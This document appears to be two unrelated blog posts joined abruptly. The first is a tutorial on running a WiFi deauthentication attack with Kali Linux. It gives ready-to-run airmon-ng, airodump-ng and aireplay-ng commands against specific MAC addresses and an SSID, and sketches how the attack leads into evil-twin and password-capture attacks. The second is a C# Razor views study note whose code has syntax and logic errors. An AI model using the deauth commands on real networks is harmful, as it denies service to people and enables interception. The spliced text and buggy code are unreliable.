How to Do a Basic 802.11 Wireless DeAuth Attack using Kali Linux to Disrupt Wireless Device Connections

I’ve been working in IT now for over 20 years and spend a percentage of my professional development time on InfoSec and IT Security related items as I feel its important to know how to use technology but also how criminals use the same technology to do bad things.

This article will be focusing on how to do a very basic WiFi “DeAuth” or deauthentication Attack using Kali Linux and the WiFi hacking tools included in it.

You can check out the Wikipedia description of a DeAuth Attack.
A “DeAuth” attack is considered a denial of service attack.  Service will be denied to WiFi devices connected and listening to messages from a specific SSID where a “man in the middle” spoofs the SSID and transmits a message to all devices to disconnect from the WiFi network.

DeAuth or deauthentication attacks are often part of a larger attack like those used to force clients to connect to an “Evil twin access point” where network packets can be captured.

Some WiFi password attacks on WPA & WPA2 use brute force techniques along with DeAuth attacks to force a device offline then sniff out the WAP 4-way handshake when it reconnects.

Other password attacks are phishing in style as they also start with a DeAuth attack but then use a man-in-the-middle to collect passwords supplied by an unwitting user. 

So how is this done?

First, the bad guy needs look around for a target which results in a wireless network target SSID.

Next, they turn their WiFi receiver in to a WiFi Transmitter.  With the WiFi transmitter, they use the WiFi transmitter to spoof the targets wireless SSID in broadcast mode. 

Attackers broadcast using the spoofed SSID transmits a “DeAuth” frame telling all the devices connected to the spoofed WiFi SSID to disconnect immediately.

**** IT IS ILLEGAL TO HACK OUTSIDE YOUR SANDBOX ****
**** DON’T DO IT & DON’T TALK ABOUT WHAT YOU DO ****

**** THIS INFORMATION IS FOR EDUCATIONAL PURPOSES ONLY ****

The information, I share below was gathered from publicly available resources and is intended as important and educational in the field of InfoSec.

I won’t cover what Kali Linux is or how to install it. I will provide some helpful links below.

This article will focus on how to use the tools in Kali Linux to go through the process of target selection and spoofing of WiFi SSID in order to launch a “DeAuth” attack denying connection to a specific WiFi signal for a period of time.

What Do You Need to Conduct a Wi-Fi Deauth Attack?

First, you’ll need Kali Linux.
Next, here are a list of Kali Linux Commands You Might Need.

Kali Linux Commands You May Need

#Tail command: tail redirects output from a file to the screen
#Use tail command to read in a file and display it on the screen

Example: tail -f -n 0 /var/log/messages

Note: -n is number of lines (default is 10), so -n 0 is a live feed of text.

Note: -f is “follow” option. output appended data as the file grows

Note: Get more help with tail by typing man tail.

Kali Linux Network Commands

#Network Config Examples
ifconfig

#Use iw to manipulate the wireless properties
iw

#Wireless Config Examples
#iwconfig [interface]
iwconfig eth0 freq 2422000000
iwconfig eth0 freq 2.422G
iwconfig eth0 channel 3
iwconfig eth0 channel auto
iwconfig wlan0 txpower 25

Pasted from <http://www.linuxcommand.org/man_pages/iwconfig8.html>

Note: Setting the county code on wireless card – Do this before modifying the transmit power.

For my USB wireless card has to have the country set before it would let me change the transmit power.

Setting the transmit power using the iw command.

iw is used to manipulate wireless properties.

Using Airmon Wireless Monitor

Kali Linux includes a tool called Airmon that has several features like airodump, aireply and others that we will use to conduct our Deauth attack.

#Airmon Wireless Monitor
#Use airmon-ng to set up a monitor

AIRMON:

airmon-ng start [interface]

Example: airmon-ng start wlan0

Note: Run the command below if you are having problems with other processes when trying to run airmon-ng

Example: airmon-ng check kill

AIRODUMP:

Note: Airodump Wireless Network MonitorUse Airodump to monitor wireless networks.

Starting airodumpairodump-ng [interface] /

Example: airodump-ng wlan0mon

Example: airodump-ng wlan0mon 
(Dump out the Monitor mon data from previous step)Press Ctrl + c to stop airodump-ng

The result is a monitor on wlan0 which shows as interface wlan0mon

Note: In the example below, the -0 represents “Type of Attack” = Deauthentication and 220 represents the amount of time to send deauthentication messages

Note: followed by the MAC Address and the Inteface that Airmon is listening on.

Example: aireplay-ng -0 220 [MAC Address] [interface]

Example: aireplay-ng -0 220 -a A0:63:91:A6:84:36 wlan0mon 
Screenshot of Recon for WiFi SSID using Airmon-ng

Changing WiFi Channel

During my training session, I had to change the channel on the wireless interface to 11 to match the SSID I’m attacking or else the attack will fail.

Command: iwconfig wlan0mon channel 11

Once the channel matched the SSID of the Wireless network I’m attacking then the sending of deauth  packets worked.

I also added a switch (parameter) for specifying the SSID to be very specific.

Example: aireplay-ng -0 220 -a E0:46:9A:37:06:F1 -e WIWX9QHK

Screenshot of iwconfig command: change channel to 11

Razor Views in C# MVC – C# Code and HTML Coexisting Together

Razor Views in C# MVC

How C# Code and HTML Coexist Together

Tonight’s study topic is Razor Views in C# MVC 5.

Here are two good resources for this topic.

Paid access to Mosh Hamedani’s Complete ASP.net MVC 5 Course. This is covered in video 16 of his course.

Also helpful, was this YouTube video that is part of a larger MVC tutorial that I really like and refer to often

VIDEO: Razor View Syntax

What are Razor Views and What Do They Do?

Specific to C# MVC, Razor Views are code snippets with special syntax made up of C# code and HTML/CSS. The C# logic can interact with and output HTML and CSS elements/attributes dynamically.

With Razor Views, we use the @ symbol to switch between C# code and HTML. 

A simple example of printing numbers from 1 to 10 using Razor.

@for {int i = 1; i <=10; i++)
{
 <b>@i</b>
}

The Output would be: 1 2 3 4 5 6 7 8 9 10
Inside the brackets, Razor sees the <b>@i</b> and knows to render the C# variable i when its proceeded with an @ character then Razor sees the angle brackets and switches back in to HTML parsing mode.

If we didn’t want to use HTML we could change the <b> tag to <text> and output would just be text without the HTML.

The most important thing to understand and remember about Razor Views is the context switching in the parser is based on detection of specific characters.

@ character starts the C# parser but HTML & text won’t parse until Razor see a tag wrapped in angle brackets. We are just switching back and forth between to parsing modes. Make sense?

The loop is C# code but the output is HTML.
In ASP Classic and .Net, the Response Object would handle the HTML output to the browser from inside the loop.

Here are two more examples to help us cement the idea in our brains.

1. A simple date:
@{
   int day = 24;
   int month = 08;
   int year = 2020;
}
Date is @day-@month-@year
Output = Date is 24-08-2020


2. Loop thru images in folder
@for (int i = 1; i <= 5; i++)
{
  <img src="~/Images/@(i).png" />
}

Notice how in the sample above, we put the variable inside the parenthesis. Why, when we didn’t do this for the date example above?

Because if we don’t C# will try and read i. and an object with a property so we have to wrap it in parenthesis. This tell the Razor syntax that we are just trying to concatenate the values.

Razor View Code Blocks

In Razor Views we define code blocks using @{}.

@{
 int SumOfEvenNumbers = 0;
 int SumOfOddNumbers = 0;

 for(int i=1; i<=10; i++)
 {
  if(i %2==0)
  {
    SumOfEvenNumbers = SumOfEvenNumber + 1;
  }
  else
  {
    SumOfOddNumbers = SumOfOddNumbers + 1;
  }
 }
}

<h3>Sum of Even Numbers = @SumOfEvenNumbers</h3>
<h3>Sum of Odd Numbers = @SumOfOddNumbers</h3>

Razor View Comments

Razor View multi-line code comments are very similar to JavaScript and CSS that use the asterisk and forward slash, /*  */, to wrap comments.

Razor View multi-line comments use ampersand and asterisk in same way. @* to start a multi-line comment and *@ to end it. (See code example below)

What’s in the Razor View Example Below?

H2 tag class name is dynamically selected based on  logic, if Model.Customers.Count is greater than 5 then change the CSS class of the H2 element to “popular”.

Also, inside the <ul> tags, Razor View code loops through the list of customers and outputs the name.  

Sample C# Razor Code Example:

@model  Vidly.ViewModels.RandomMovieViewModel
@{
    ViewBag.Title = "Random";
    Layout = "~/Views/Shared/_Layout.cshtml";
}
 
@*
    This is a comment
    on multiple lines
*@
 
@{
    var className = Model.Customers.Count > 5? "popular": null;
}
 
<h2 class="@className">@Model.Movie.Name</h2>
 
@if (Model.Customers.Count == 0)
{
    <text>No one has rented the movie before.</text>
}
 
else 
{
    <ul>
        @foreach (var cusomter in Model.Customers)
        {
            <li>@cusomter.Name</li>
        }
     </ul>
}